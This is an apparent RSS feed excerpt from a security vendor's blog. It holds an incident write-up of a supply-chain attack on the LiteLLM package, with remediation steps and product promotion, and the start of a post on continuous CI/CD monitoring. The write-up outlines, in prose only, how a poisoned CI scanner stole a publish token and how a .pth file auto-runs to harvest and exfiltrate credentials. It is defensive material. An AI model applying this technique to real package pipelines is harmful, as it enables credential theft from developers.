   &lt;div style="font-family: sans-serif; font-size: 18px; font-weight: 800; color: #f0ede8; line-height: 1.3; margin-bottom: 8px;"&gt;
    Runner Guard is the free scanner.
    &lt;br&gt;ThreatCERT is the enterprise platform behind it.
   &lt;/div&gt; 
   &lt;div style="font-size: 13px; color: #8a9baa; line-height: 1.6; margin-bottom: 16px; max-width: 480px; margin-left: auto; margin-right: auto;"&gt;
    Continuous CI/CD monitoring, supply chain risk scoring, and real-time alerting correlated with network, DNS, TLS, and dark web intelligence across your entire vendor chain.
   &lt;/div&gt; 
   &lt;a href="https://www.vigilantdefense.com/threatcert" style="display: inline-block; padding: 12px 32px; background: #2db8a0; border-radius: 6px; font-family: sans-serif; font-size: 13px; font-weight: bold; color: #ffffff; text-decoration: none; letter-spacing: .5px;"&gt;LEARN ABOUT THREATCERT&lt;/a&gt;
  &lt;/div&gt;  
  &lt;div style="font-family: sans-serif; font-size: 10px; font-weight: bold; letter-spacing: .12em; color: #2db8a0; margin-bottom: 16px;"&gt;
   WHY THIS ATTACK IS DIFFERENT
  &lt;/div&gt; 
  &lt;div style="margin-bottom: 28px;"&gt; 
   &lt;div style="background: #1c2433; border-radius: 8px; padding: 16px 20px; border-left: 3px solid #e5533a; margin-bottom: 12px;"&gt; 
    &lt;div style="font-family: sans-serif; font-size: 13px; font-weight: bold; color: #f0ede8; margin-bottom: 4px;"&gt;
     No click required
    &lt;/div&gt; 
    &lt;div style="font-size: 13px; color: #6a7a8a; line-height: 1.6;"&gt;
     This was not phishing. The attack was delivered through a routine software update. Any developer who ran 
     &lt;span style="font-family: monospace; color: #2db8a0; font-size: 12px;"&gt;pip install --upgrade litellm&lt;/span&gt; was compromised automatically.
    &lt;/div&gt; 
   &lt;/div&gt; 
   &lt;div style="background: #1c2433; border-radius: 8px; padding: 16px 20px; border-left: 3px solid #e5533a; margin-bottom: 12px;"&gt; 
    &lt;div style="font-family: sans-serif; font-size: 13px; font-weight: bold; color: #f0ede8; margin-bottom: 4px;"&gt;
     Security tools were the weapon
    &lt;/div&gt; 
    &lt;div style="font-size: 13px; color: #6a7a8a; line-height: 1.6;"&gt;
     The attackers compromised a vulnerability scanner. Organizations that were actively trying to be secure were the ones who got hit.
    &lt;/div&gt; 
   &lt;/div&gt; 
   &lt;div style="background: #1c2433; border-radius: 8px; padding: 16px 20px; border-left: 3px solid #e5533a; margin-bottom: 12px;"&gt; 
    &lt;div style="font-family: sans-serif; font-size: 13px; font-weight: bold; color: #f0ede8; margin-bottom: 4px;"&gt;
     AI keys are the prize
    &lt;/div&gt; 
    &lt;div style="font-size: 13px; color: #6a7a8a; line-height: 1.6;"&gt;
     LiteLLM manages API keys for OpenAI, Anthropic, Azure, AWS, and every other major AI provider. The attacker targeted the one package that has access to every AI API key in an organization.
    &lt;/div&gt; 
   &lt;/div&gt; 
   &lt;div style="background: #1c2433; border-radius: 8px; padding: 16px 20px; border-left: 3px solid #e5533a;"&gt; 
    &lt;div style="font-family: sans-serif; font-size: 13px; font-weight: bold; color: #f0ede8; margin-bottom: 4px;"&gt;
     Transitive dependencies are attack vectors
    &lt;/div&gt; 
    &lt;div style="font-size: 13px; color: #6a7a8a; line-height: 1.6;"&gt;
     The compromise was discovered when an MCP plugin pulled LiteLLM as a transitive dependency. Developers who never directly installed it were still exposed.
    &lt;/div&gt; 
   &lt;/div&gt; 
  &lt;/div&gt;  
  &lt;div style="font-family: sans-serif; font-size: 10px; font-weight: bold; letter-spacing: .12em; color: #2db8a0; margin-bottom: 16px;"&gt;
   THE BROADER LANDSCAPE: 50,000 REPOS SCANNED
  &lt;/div&gt; 
  &lt;div style="font-size: 13px; color: #8a9baa; line-height: 1.65; margin-bottom: 16px;"&gt;
   Vigilant conducted the largest CI/CD security scan ever performed. The numbers speak for themselves:
  &lt;/div&gt; 
  &lt;div style="margin-bottom: 12px;"&gt; 
   &lt;div style="display: inline-block; width: 48%; background: #1c2433; padding: 16px 20px; border-radius: 8px; text-align: center; vertical-align: top; margin-right: 2%;"&gt; 
    &lt;div style="font-family: sans-serif; font-size: 36px; font-weight: 800; color: #2db8a0; line-height: 1;"&gt;
     50,012
    &lt;/div&gt; 
    &lt;div style="font-family: sans-serif; font-size: 10px; letter-spacing: .1em; color: #5a6a7a; margin-top: 6px; font-weight: bold;"&gt;
     REPOS SCANNED
    &lt;/div&gt; 
   &lt;/div&gt; 
   &lt;div style="display: inline-block; width: 48%; background: #1c2433; padding: 16px 20px; border-radius: 8px; text-align: center; vertical-align: top;"&gt; 
    &lt;div style="font-family: sans-serif; font-size: 36px; font-weight: 800; color: #e5533a; line-height: 1;"&gt;
     192,776
    &lt;/div&gt; 
    &lt;div style="font-family: sans-serif; font-size: 10px; letter-spacing: .1em; color: #5a6a7a; margin-top: 6px; font-weight: bold;"&gt;
     VULNERABILITIES FOUND
    &lt;/div&gt; 
   &lt;/div&gt; 
  &lt;/div&gt; 
  &lt;div style="margin-bottom: 28px;"&gt; 
   &lt;div style="display: inline-block; width: 48%; background: #1c2433; padding: 16px 20px; border-radius: 8px; text-align: center; vertical-align: top; margin-right: 2%;"&gt; 
    &lt;div style="font-family: sans-serif; font-size: 36px; font-weight: 800; color: #e5533a; line-height: 1;"&gt;
     40.6%
    &lt;/div&gt; 
    &lt;div style="font-family: sans-serif; font-size: 10px; letter-spacing: .1em; color: #5a6a7a; margin-top: 6px; font-weight: bold;"&gt;
     VULNERABLE RATE
    &lt;/div&gt; 
   &lt;/div&gt; 
   &lt;div style="display: inline-block; width: 48%; background: #1c2433; padding: 16px 20px; border-radius: 8px; text-align: center; vertical-align: top;"&gt; 
    &lt;div style="font-family: sans-serif; font-size: 36px; font-weight: 800; color: #e5533a; line-height: 1;"&gt;
     68%
    &lt;/div&gt; 
    &lt;div style="font-family: sans-serif; font-size: 10px; letter-spacing: .1em; color: #5a6a7a; margin-top: 6px; font-weight: bold;"&gt;
     VULN RATE FOR 50K+ STAR REPOS
    &lt;/div&gt; 
   &lt;/div&gt; 
  &lt;/div&gt;  
  &lt;div style="border-top: 1px solid #2a3545; padding-top: 20px; margin-bottom: 20px;"&gt; 
   &lt;div style="font-family: sans-serif; font-size: 10px; font-weight: bold; letter-spacing: .12em; color: #2db8a0; margin-bottom: 10px;"&gt;
    SCAN YOURS NOW
   &lt;/div&gt; 
   &lt;div style="font-family: monospace; font-size: 12px; background: #0d1117; border-radius: 6px; padding: 12px 16px; color: #2db8a0; line-height: 2; border-left: 3px solid #2db8a0;"&gt;
    brew install Vigilant-LLC/tap/runner-guard
    &lt;br&gt;runner-guard scan .
   &lt;/div&gt; 
  &lt;/div&gt;  
  &lt;a href="https://www.vigilantdefense.com/threatcert" style="display: block; background: #e5533a; border-radius: 8px; padding: 16px 24px; text-align: center; text-decoration: none; margin-bottom: 0;"&gt; 
   &lt;div style="font-family: sans-serif; font-size: 10px; font-weight: bold; letter-spacing: .12em; color: #ffffff99; margin-bottom: 4px;"&gt;
    FROM THE MAKERS OF RUNNER GUARD
   &lt;/div&gt; 
   &lt;div style="font-family: sans-serif; font-size: 16px; font-weight: 800; color: #ffffff;"&gt;
    Get Continuous Protection with ThreatCERT
   &lt;/div&gt; &lt;/a&gt;
 &lt;/div&gt;   
 &lt;h2 style="margin: 36px 0 12px 0; font-size: 22px; font-weight: 800; color: #07161d; font-family: 'Barlow',Arial,sans-serif;"&gt;How the LiteLLM Attack Worked&lt;/h2&gt; 
 &lt;p style="color: #2d3748 !important; font-size: 1.0625rem !important; line-height: 1.8 !important; margin-bottom: 1.25rem !important;"&gt;This attack is a textbook example of a multi-hop supply chain compromise. Each step was deliberate and calculated:&lt;/p&gt; 
 &lt;ol style="margin: 0 0 24px 0; padding-left: 24px;"&gt; 
  &lt;li style="margin-bottom: 10px;"&gt;Attackers compromised Aqua Security's Trivy vulnerability scanner through its GitHub Action&lt;/li&gt; 
  &lt;li style="margin-bottom: 10px;"&gt;LiteLLM's CI/CD pipeline ran Trivy as part of its build process, pulled without a pinned version&lt;/li&gt; 
  &lt;li style="margin-bottom: 10px;"&gt;The compromised Trivy exfiltrated LiteLLM's PyPI publish token from the CI/CD runner&lt;/li&gt; 
  &lt;li style="margin-bottom: 10px;"&gt;Attackers used the stolen token to push malicious LiteLLM versions (1.82.7, 1.82.8) to PyPI&lt;/li&gt; 
  &lt;li style="margin-bottom: 10px;"&gt;A hidden &lt;code style="background: #F0F0F0; padding: 2px 6px; border-radius: 3px; font-size: 14px;"&gt;.pth&lt;/code&gt; file executes automatically when Python starts. No import needed. Just having the package installed is enough&lt;/li&gt; 
  &lt;li style="margin-bottom: 10px;"&gt;The payload harvested all environment variables, SSH keys, cloud credentials, and AI API keys, then sent everything to attacker infrastructure&lt;/li&gt; 
 &lt;/ol&gt; 
 &lt;h2 style="margin: 36px 0 12px 0; font-size: 22px; font-weight: 800; color: #07161d; font-family: 'Barlow',Arial,sans-serif;"&gt;Why This Matters to Your Organization&lt;/h2&gt; 
 &lt;p style="color: #2d3748 !important; font-size: 1.0625rem !important; line-height: 1.8 !important; margin-bottom: 1.25rem !important;"&gt;LiteLLM is not an obscure library. It is the most widely used AI API gateway, with 97 million monthly downloads. It is specifically designed to hold and manage API keys for OpenAI, Anthropic, Azure, AWS Bedrock, and every other major LLM provider. The attacker deliberately targeted the one package that, by definition, has access to every AI API key in an organization.&lt;/p&gt; 
 &lt;p style="color: #2d3748 !important; font-size: 1.0625rem !important; line-height: 1.8 !important; margin-bottom: 1.25rem !important;"&gt;If your organization uses LiteLLM, or uses any software that depends on LiteLLM as a transitive dependency, you may be affected. The malicious payload was discovered when an MCP plugin running inside a code editor pulled the compromised package as a transitive dependency, meaning developers who never directly installed LiteLLM were still exposed.&lt;/p&gt; 
 &lt;div style="background-color: #fff4ee; border-left: 4px solid #FF5D2C; padding: 16px 20px; border-radius: 0 4px 4px 0; margin: 24px 0;"&gt; 
  &lt;p style="margin: 0; font-size: 16px; line-height: 1.75; color: #07161d; font-family: 'Barlow',Arial,sans-serif;"&gt;&lt;strong&gt;The critical takeaway:&lt;/strong&gt; This attack did not require clicking a link, opening an email, or visiting a website. It was delivered through a routine software update. Any organization that ran &lt;code style="background: #F0F0F0; padding: 2px 6px; border-radius: 3px; font-size: 14px;"&gt;pip install --upgrade litellm&lt;/code&gt; in the past 48 hours should assume credential compromise and begin rotation immediately.&lt;/p&gt; 
 &lt;/div&gt; 
 &lt;h2 style="margin: 36px 0 12px 0; font-size: 22px; font-weight: 800; color: #07161d; font-family: 'Barlow',Arial,sans-serif;"&gt;Vigilant's Research: We Found This Pattern Before the Attack&lt;/h2&gt; 
 &lt;p style="color: #2d3748 !important; font-size: 1.0625rem !important; line-height: 1.8 !important; margin-bottom: 1.25rem !important;"&gt;After the tj-actions attack in early March, Vigilant built and open-sourced &lt;a href="https://www.vigilantdefense.com/resources/runner-guard" style="color: #00a19b; text-decoration: none; font-weight: 600;"&gt;Runner Guard&lt;/a&gt;, a free CI/CD security scanner, and conducted the largest scan of its kind, examining the 50,000 most-starred repositories on GitHub for the exact vulnerability classes that enabled this attack chain.&lt;/p&gt; 
 &lt;p style="color: #2d3748 !important; font-size: 1.0625rem !important; line-height: 1.8 !important; margin-bottom: 1.25rem !important;"&gt;Our scan of the LiteLLM repository specifically found &lt;strong style="color: #07161d;"&gt;135 CI/CD vulnerabilities across 6 rule categories&lt;/strong&gt; before this attack occurred. Across the broader dataset of 50,000 repositories, we found &lt;strong style="color: #07161d;"&gt;192,776 CI/CD vulnerabilities&lt;/strong&gt; affecting &lt;strong style="color: #07161d;"&gt;20,265 repositories&lt;/strong&gt;, with &lt;strong style="color: #07161d;"&gt;590 million downstream forks&lt;/strong&gt; inheriting these vulnerable configurations.&lt;/p&gt; 
 &lt;p style="color: #2d3748 !important; font-size: 1.0625rem !important; line-height: 1.8 !important; margin-bottom: 1.25rem !important;"&gt;The most popular, most trusted projects are the most exposed. Repositories with 50,000+ stars have a 68% vulnerability rate. Vigilant is the first and only organization to conduct research at this scale. The full findings are published at &lt;a href="https://www.vigilantdefense.com/research/github-top-50k-repos-cicd-security-scan" style="color: #00a19b; text-decoration: none; font-weight: 600;"&gt;vigilantdefense.com/research&lt;/a&gt;.&lt;/p&gt;  
 &lt;div style="background: #07161D; border-radius: 8px; padding: 28px 32px; margin: 36px 0; text-align: center;"&gt; 
  &lt;p style="margin: 0 0 6px 0; font-size: 10px; font-weight: bold; letter-spacing: 2.5px; color: #00a19b; text-transform: uppercase; font-family: 'Barlow',Arial,sans-serif;"&gt;Continuous Monitoring&lt;/p&gt; 
  &lt;p style="margin: 0 0 8px 0; font-size: 20px; font-weight: 800; color: #ffffff; line-height: 1.3; font-family: 'Barlow',Arial,sans-serif;"&gt;Runner Guard Was Built on ThreatCERT&lt;/p&gt; 
  &lt;p style="margin: 0 0 20px 0; font-size: 14px; line-height: 1.6; color: #7a9bad; font-family: 'Barlow',Arial,sans-serif;"&gt;Runner Guard is the free, open-source scanner. ThreatCERT is the enterprise platform behind it: continuous CI/CD monitoring, supply chain risk scoring, and real-time alerting correlated with network, DNS, TLS, and dark web intelligence across your entire vendor chain.&lt;/p&gt; 
  &lt;a href="https://www.vigilantdefense.com/threatcert" style="display: inline-block; padding: 14px 36px; background-color: #00a19b; border-radius: 4px; font-size: 14px; font-weight: bold; color: #ffffff; text-decoration: none; letter-spacing: 0.5px; font-family: 'Barlow',Arial,sans-serif;"&gt;LEARN ABOUT THREATCERT&lt;/a&gt;
 &lt;/div&gt; 
 &lt;h2 style="margin: 36px 0 12px 0; font-size: 22px; font-weight: 800; color: #07161d; font-family: 'Barlow',Arial,sans-serif;"&gt;Recommended Actions&lt;/h2&gt; 
 &lt;h3 style="margin: 24px 0 8px 0; font-size: 14px; font-weight: bold; color: #07161d; text-transform: uppercase; letter-spacing: 1px; font-family: 'Barlow',Arial,sans-serif;"&gt;Immediate: Next 24 Hours&lt;/h3&gt; 
 &lt;ol style="margin: 0 0 24px 0; padding-left: 24px;"&gt; 
  &lt;li style="margin-bottom: 12px;"&gt;&lt;strong style="color: #07161d;"&gt;Check for LiteLLM exposure.&lt;/strong&gt; Determine if any system, application, or developer machine in your environment has LiteLLM installed. Check both direct installations and transitive dependencies. If versions 1.82.7 or 1.82.8 are present, assume all credentials on that machine have been compromised.&lt;/li&gt; 
  &lt;li style="margin-bottom: 12px;"&gt;&lt;strong style="color: #07161d;"&gt;Rotate all AI API keys and cloud credentials.&lt;/strong&gt; If LiteLLM was present in any form, rotate every API key, cloud credential, and SSH key on the affected systems. This includes OpenAI, Anthropic, Azure, AWS, and any other service credentials that were accessible as environment variables.&lt;/li&gt; 
  &lt;li style="margin-bottom: 12px;"&gt;&lt;strong style="color: #07161d;"&gt;Freeze all open-source package updates.&lt;/strong&gt; Do not update any open-source dependency until it has been verified as safe. This applies to pip, npm, go modules, and any other package manager. The supply chain is actively under attack. Treat every update as potentially hostile until verified.&lt;/li&gt; 
  &lt;li style="margin-bottom: 12px;"&gt;&lt;strong style="color: #07161d;"&gt;Review CI/CD pipeline dependencies.&lt;/strong&gt; Identify every third-party tool, action, or scanner that runs in your build pipelines. If any are pulled without version pinning or integrity verification, they are a potential entry point for this same attack pattern.&lt;/li&gt; 
 &lt;/ol&gt; 
 &lt;h3 style="margin: 24px 0 8px 0; font-size: 14px; font-weight: bold; color: #07161d; text-transform: uppercase; letter-spacing: 1px; font-family: 'Barlow',Arial,sans-serif;"&gt;Near-Term: Next 7 Days&lt;/h3&gt; 
 &lt;ol style="margin: 0 0 24px 0; padding-left: 24px;" start="5"&gt; 
  &lt;li style="margin-bottom: 12px;"&gt;&lt;strong style="color: #07161d;"&gt;Scan your repositories with Runner Guard.&lt;/strong&gt; Vigilant's open-source CI/CD scanner detects the exact vulnerability classes exploited in this attack chain. It is free, takes one command to run, and covers 15 security rule categories including supply chain trust, injection, privilege escalation, and AI agent configuration risks.&lt;/li&gt; 
 &lt;/ol&gt; 
 &lt;div style="background-color: #07161d; padding: 16px 20px; border-radius: 4px; margin: 0 0 24px 0;"&gt; 
  &lt;p style="margin: 0 0 4px 0; font-size: 12px; color: #7a9bad; font-family: 'Courier New',monospace;"&gt;$ brew install Vigilant-LLC/tap/runner-guard&lt;/p&gt; 
  &lt;p style="margin: 0; font-size: 12px; color: #00a19b; font-family: 'Courier New',monospace;"&gt;$ runner-guard scan .&lt;/p&gt; 
 &lt;/div&gt; 
 &lt;ol style="margin: 0 0 24px 0; padding-left: 24px;" start="6"&gt; 
  &lt;li style="margin-bottom: 12px;"&gt;&lt;strong style="color: #07161d;"&gt;Scan any third-party open-source project before adoption or update.&lt;/strong&gt; Clone the repository locally and run Runner Guard against it before integrating it into your environment. If it has unpinned dependencies, overly permissive tokens, or injection vulnerabilities in its CI/CD pipeline, those are the exact entry points attackers are exploiting right now.&lt;/li&gt; 
  &lt;li style="margin-bottom: 12px;"&gt;&lt;strong style="color: #07161d;"&gt;Implement version pinning.&lt;/strong&gt; Every GitHub Action, every package dependency, and every tool in your CI/CD pipeline should be pinned to an immutable hash, not a mutable version tag. Tags like &lt;code style="background: #F0F0F0; padding: 2px 6px; border-radius: 3px; font-size: 14px;"&gt;@v3&lt;/code&gt; or &lt;code style="background: #F0F0F0; padding: 2px 6px; border-radius: 3px; font-size: 14px;"&gt;@latest&lt;/code&gt; can be silently redirected to malicious code. SHA pinning is the only reliable defense.&lt;/li&gt; 
  &lt;li style="margin-bottom: 12px;"&gt;&lt;strong style="color: #07161d;"&gt;Establish an update verification process.&lt;/strong&gt; No open-source package should be updated in production environments without first verifying the new version against known-good checksums, reviewing the changelog for unexpected changes, and scanning the project's CI/CD configuration for vulnerabilities.&lt;/li&gt; 
 &lt;/ol&gt; 
 &lt;h2 style="margin: 36px 0 12px 0; font-size: 22px; font-weight: 800; color: #07161d; font-family: 'Barlow',Arial,sans-serif;"&gt;Supply Chain Security Best Practices&lt;/h2&gt; 
 &lt;ul style="margin: 0 0 24px 0; padding-left: 24px;"&gt; 
  &lt;li style="margin-bottom: 12px;"&gt;&lt;strong style="color: #07161d;"&gt;Do not update any open-source package today without scanning it first.&lt;/strong&gt; The supply chain is actively compromised. Treat every update as suspicious until verified.&lt;/li&gt; 
  &lt;li style="margin-bottom: 12px;"&gt;&lt;strong style="color: #07161d;"&gt;Be careful what you install.&lt;/strong&gt; Transitive dependencies are attack vectors. LiteLLM was pulled as a dependency of other packages. Developers who never directly installed it were still compromised.&lt;/li&gt; 
  &lt;li style="margin-bottom: 12px;"&gt;&lt;strong style="color: #07161d;"&gt;Pin everything.&lt;/strong&gt; Mutable version tags are the root cause of this entire attack chain. SHA pinning for GitHub Actions. Lock files with integrity hashes for package managers. No exceptions.&lt;/li&gt; 
  &lt;li style="margin-bottom: 12px;"&gt;&lt;strong style="color: #07161d;"&gt;Apply least-privilege to CI/CD tokens.&lt;/strong&gt; If LiteLLM's PyPI publish token had been scoped to only run during tagged releases with manual approval, the attacker could not have pushed a malicious version from a compromised build step.&lt;/li&gt; 
  &lt;li style="margin-bottom: 12px;"&gt;&lt;strong style="color: #07161d;"&gt;Monitor for anomalous package behavior.&lt;/strong&gt; The LiteLLM compromise was discovered because a developer's machine ran out of RAM from a fork bomb in the payload. Not every compromise will be that obvious. Monitor for unexpected network connections, environment variable access, and file system changes from your dependencies.&lt;/li&gt; 
 &lt;/ul&gt;  
 &lt;div style="background: #07161D; padding: 24px 28px; border-radius: 6px; margin: 36px 0;"&gt; 
  &lt;p style="margin: 0; font-size: 18px; font-weight: bold; color: #ffffff; line-height: 1.6; font-family: 'Barlow',Arial,sans-serif;"&gt;Three attacks in three weeks. Each one used the last as a stepping stone. The 20,000 other vulnerable repositories we identified are the next target list. Scan your repos before someone else does.&lt;/p&gt; 
 &lt;/div&gt;  
 &lt;div style="margin: 36px 0;"&gt; 
  &lt;div style="display: inline-block; width: 48%; background: #07161D; border-radius: 8px; padding: 24px; text-align: center; vertical-align: top; margin-right: 2%;"&gt; 
   &lt;p style="margin: 0 0 8px 0; font-size: 10px; font-weight: bold; letter-spacing: 2px; color: #ff5d2c; text-transform: uppercase; font-family: 'Barlow',Arial,sans-serif;"&gt;Free Tool&lt;/p&gt; 
   &lt;p style="margin: 0 0 16px 0; font-size: 16px; font-weight: bold; color: #ffffff; line-height: 1.4; font-family: 'Barlow',Arial,sans-serif;"&gt;Download Runner Guard&lt;/p&gt; 
   &lt;a href="https://www.vigilantdefense.com/resources/runner-guard" style="display: inline-block; padding: 12px 24px; background-color: #ff5d2c; border-radius: 4px; font-size: 13px; font-weight: bold; color: #ffffff; text-decoration: none; font-family: 'Barlow',Arial,sans-serif;"&gt;SCAN NOW - FREE&lt;/a&gt;
  &lt;/div&gt; 
  &lt;div style="display: inline-block; width: 48%; background: #0D2B3E; border-radius: 8px; padding: 24px; text-align: center; vertical-align: top; border: 1px solid #1A3D54;"&gt; 
   &lt;p style="margin: 0 0 8px 0; font-size: 10px; font-weight: bold; letter-spacing: 2px; color: #00a19b; text-transform: uppercase; font-family: 'Barlow',Arial,sans-serif;"&gt;Enterprise Platform&lt;/p&gt; 
   &lt;p style="margin: 0 0 16px 0; font-size: 16px; font-weight: bold; color: #ffffff; line-height: 1.4; font-family: 'Barlow',Arial,sans-serif;"&gt;ThreatCERT by Vigilant&lt;/p&gt; 
   &lt;a href="https://www.vigilantdefense.com/threatcert" style="display: inline-block; padding: 12px 24px; background-color: #00a19b; border-radius: 4px; font-size: 13px; font-weight: bold; color: #ffffff; text-decoration: none; font-family: 'Barlow',Arial,sans-serif;"&gt;LEARN MORE&lt;/a&gt;
  &lt;/div&gt; 
 &lt;/div&gt;  
 &lt;div style="background: #F8FAFB; border-radius: 8px; padding: 20px 24px; border: 1px solid #E8ECF0; margin: 0 0 36px 0; text-align: center;"&gt; 
  &lt;p style="margin: 0 0 12px 0; font-size: 16px; font-weight: bold; color: #07161d; font-family: 'Barlow',Arial,sans-serif;"&gt;Read the Full 50K Scan Research&lt;/p&gt; 
  &lt;p style="margin: 0 0 16px 0; font-size: 13px; line-height: 1.6; color: #4a5568; font-family: 'Barlow',Arial,sans-serif;"&gt;The largest CI/CD security scan ever conducted. 50,012 repos. 192,776 findings.&lt;/p&gt; 
  &lt;a href="https://www.vigilantdefense.com/research/github-top-50k-repos-cicd-security-scan" style="display: inline-block; padding: 12px 28px; background-color: #315068; border-radius: 4px; font-size: 13px; font-weight: bold; color: #ffffff; text-decoration: none; font-family: 'Barlow',Arial,sans-serif;"&gt;VIEW RESEARCH REPORT&lt;/a&gt;
 &lt;/div&gt;  
 &lt;p style="margin: 0; font-size: 11px; color: #718096; line-height: 1.7; font-style: italic; border-top: 1px solid #E8ECF0; padding-top: 20px;"&gt;&lt;strong style="font-style: normal; color: #4a5568;"&gt;Sources:&lt;/strong&gt; The Register, The Hacker News, Wiz Security Blog, Snyk Security Research, ARMO Security, GitHub Advisory Database, Vigilant 50K Scan Research.&lt;/p&gt; 
&lt;/div&gt;  
&lt;img src="https://track.hubspot.com/__ptq.gif?a=45116655&amp;amp;k=14&amp;amp;r=https%3A%2F%2Fvigilantdefense.com%2Fresearch%2Ffrom-scanner-to-weapon-inside-the-supply-chain-attack-that-backdoored-the-1-ai-key-management-library&amp;amp;bu=https%253A%252F%252Fvigilantdefense.com%252Fresearch&amp;amp;bvt=rss" alt="" width="1" height="1" style="min-height:1px!important;width:1px!important;border-width:0!important;margin-top:0!important;margin-bottom:0!important;margin-right:0!important;margin-left:0!important;padding-top:0!important;padding-bottom:0!important;padding-right:0!important;padding-left:0!important; "&gt;</content:encoded>
      <category>Github</category>
      <category>CICD</category>
      <category>litellm</category>
      <category>trivy</category>
      <pubDate>Wed, 25 Mar 2026 21:37:42 GMT</pubDate>
      <author>sales@vigilantnow.com (Chris Nyhuis)</author>
      <guid>https://vigilantdefense.com/research/from-scanner-to-weapon-inside-the-supply-chain-attack-that-backdoored-the-1-ai-key-management-library</guid>
      <dc:date>2026-03-25T21:37:42Z</dc:date>
    </item>
    <item>
      <title>Beyond Snapshots — Why CI/CD Security Needs Continuous Monitoring</title>
      <link>https://vigilantdefense.com/research/cicd-security-continuous-monitoring-beyond-snapshots</link>
      <description>&lt;div class="hs-featured-image-wrapper"&gt; 
 &lt;a href="https://vigilantdefense.com/research/cicd-security-continuous-monitoring-beyond-snapshots" title="" class="hs-featured-image-link"&gt; &lt;img src="https://vigilantdefense.com/hubfs/articles/cicd-research/images/13-threatcert-radar.png" alt="Beyond Snapshots — Why CI/CD Security Needs Continuous Monitoring" class="hs-featured-image" style="width:auto !important; max-width:50%; float:left; margin:0 15px 15px 0;"&gt; &lt;/a&gt; 
&lt;/div&gt; 
&lt;div&gt; 
 &lt;div style="font-weight: bold; font-size: 1rem; color: #07161d;"&gt;
   Chris Nyhuis 
 &lt;/div&gt; 
 &lt;div style="font-size: 0.85rem; color: #6b7280; font-weight: 500;"&gt;
   CEO, Vigilant 
 &lt;/div&gt; 
 &lt;div style="font-size: 0.8rem; color: #9ca3af; font-weight: 500;"&gt;
   11 min read 
 &lt;/div&gt; 
&lt;/div&gt;</description>
      <content:encoded>&lt;div&gt; 
 &lt;div style="font-weight: bold; font-size: 1rem; color: #07161d;"&gt;
  Chris Nyhuis
 &lt;/div&gt; 
 &lt;div style="font-size: 0.85rem; color: #6b7280; font-weight: 500;"&gt;
  CEO, Vigilant
 &lt;/div&gt; 
 &lt;div style="font-size: 0.8rem; color: #9ca3af; font-weight: 500;"&gt;
  11 min read
 &lt;/div&gt; 
&lt;/div&gt;  
&lt;div style="font-size: 0.85rem; color: #00a19b; font-style: italic; margin-bottom: 1.5rem;"&gt;
 Part of a 9-part research series on CI/CD pipeline security. 
 &lt;a href="#related-articles" style="color: #ff5d2c; text-decoration: none;"&gt;See all articles below.&lt;/a&gt;
&lt;/div&gt; 
&lt;blockquote&gt; 
 &lt;p&gt;We scanned 50,000 repos once. By the time you read this, the results are already stale. Developers have added new workflows, changed action versions, and introduced new injection sinks. A scan captures a moment. Continuous monitoring captures the trajectory.&lt;/p&gt; 
&lt;/blockquote&gt; 
&lt;h2&gt;The Setup&lt;/h2&gt; 
&lt;p&gt;This entire research series - from the &lt;a href="https://www.vigilantdefense.com/research/github-top-50k-repos-cicd-security-scan"&gt;pillar findings&lt;/a&gt; through the &lt;a href="https://www.vigilantdefense.com/research/supply-chain-crisis-unpinned-github-actions"&gt;supply chain crisis&lt;/a&gt;, the &lt;a href="https://www.vigilantdefense.com/research/cicd-chain-attack-anatomy-recon-to-exfiltration"&gt;chain attack anatomy&lt;/a&gt;, and the &lt;a href="https://www.vigilantdefense.com/research/ai-agents-cicd-supply-chain-force-multipliers"&gt;AI force multiplier&lt;/a&gt; - is based on a single scan. 50,012 repos. One point in time. March 2026.&lt;/p&gt; 
&lt;p&gt;The findings are real. The data is accurate. And it’s already aging.&lt;/p&gt; 
&lt;p&gt;In the time between our scan and your reading of this article, repositories have added new workflow files, updated action versions, changed permission blocks, added new triggers, and introduced new expression interpolation patterns. Some of the 20,265 vulnerable repos have been fixed. Some of the 29,747 clean repos have introduced new vulnerabilities. The dataset is a snapshot - useful for understanding the scope of the problem, insufficient for maintaining security.&lt;/p&gt; 
&lt;p&gt;This is the fundamental limitation of point-in-time scanning, and it’s the problem this article addresses.&lt;/p&gt; 
&lt;h2&gt;The Snapshot Blindness Problem&lt;/h2&gt; 
&lt;p&gt;Snapshot Blindness is the gap between what a single scan reveals and what’s actually happening in a continuously evolving environment. Every security tool that runs once and reports results suffers from it. The report is accurate at the moment of capture and progressively less accurate with every passing day.&lt;/p&gt; 
&lt;p&gt;In CI/CD, Snapshot Blindness is particularly acute because:&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;Pipelines change constantly.&lt;/strong&gt; Developers modify workflows weekly - new build steps, new actions, new deployment targets, new triggers. Each change can introduce or resolve vulnerabilities. A repo that was clean yesterday can have five new findings today because a developer added an unpinned action in a new release workflow.&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;Action maintainers push updates behind mutable tags.&lt;/strong&gt; Your pinned-yesterday action could be compromised today. The mutable tag still says &lt;code&gt;@v3&lt;/code&gt;, but &lt;code&gt;@v3&lt;/code&gt; now points to different code. Without continuous monitoring, you won’t know until the next manual scan - if there is one.&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;GitHub releases new features that change the security model.&lt;/strong&gt; Artifact attestation, OIDC improvements, reusable workflow enhancements, new trigger types - the platform evolves, and each evolution can change the risk profile of existing workflows.&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;Dependencies shift.&lt;/strong&gt; The action you depend on changed maintainers. A single-maintainer project went dormant. An organization’s security posture degraded. These are temporal signals that a single scan can’t capture.&lt;/p&gt; 
&lt;p&gt;The 50K scan we ran is the most comprehensive CI/CD security dataset ever published. And it’s a single frame from a continuous movie. The story it tells is directionally correct but temporally limited.&lt;/p&gt; 
&lt;h2&gt;From Runner Guard to ThreatCert&lt;/h2&gt; 
&lt;p&gt;Vigilant built Runner Guard as the open-source answer to “scan your repos right now.” It’s free, it’s fast, and it detects 14 vulnerability classes that no other scanner covers - including AI config injection (RGS-010, RGS-011) and taint-to-execution chain analysis.&lt;/p&gt; 
&lt;p&gt;Runner Guard is the right tool for a point-in-time assessment. For continuous monitoring, ThreatCert picks up where Runner Guard leaves off.&lt;/p&gt; 
&lt;h3&gt;What Runner Guard Does&lt;/h3&gt; 
&lt;ul&gt; 
 &lt;li&gt;Scans GitHub Actions workflow files for 14 security rule categories&lt;/li&gt; 
 &lt;li&gt;Autofix engine for SHA pinning (RGS-007)&lt;/li&gt; 
 &lt;li&gt;Console, JSON, and SARIF output formats&lt;/li&gt; 
 &lt;li&gt;Runs locally, in CI, or against remote GitHub repos&lt;/li&gt; 
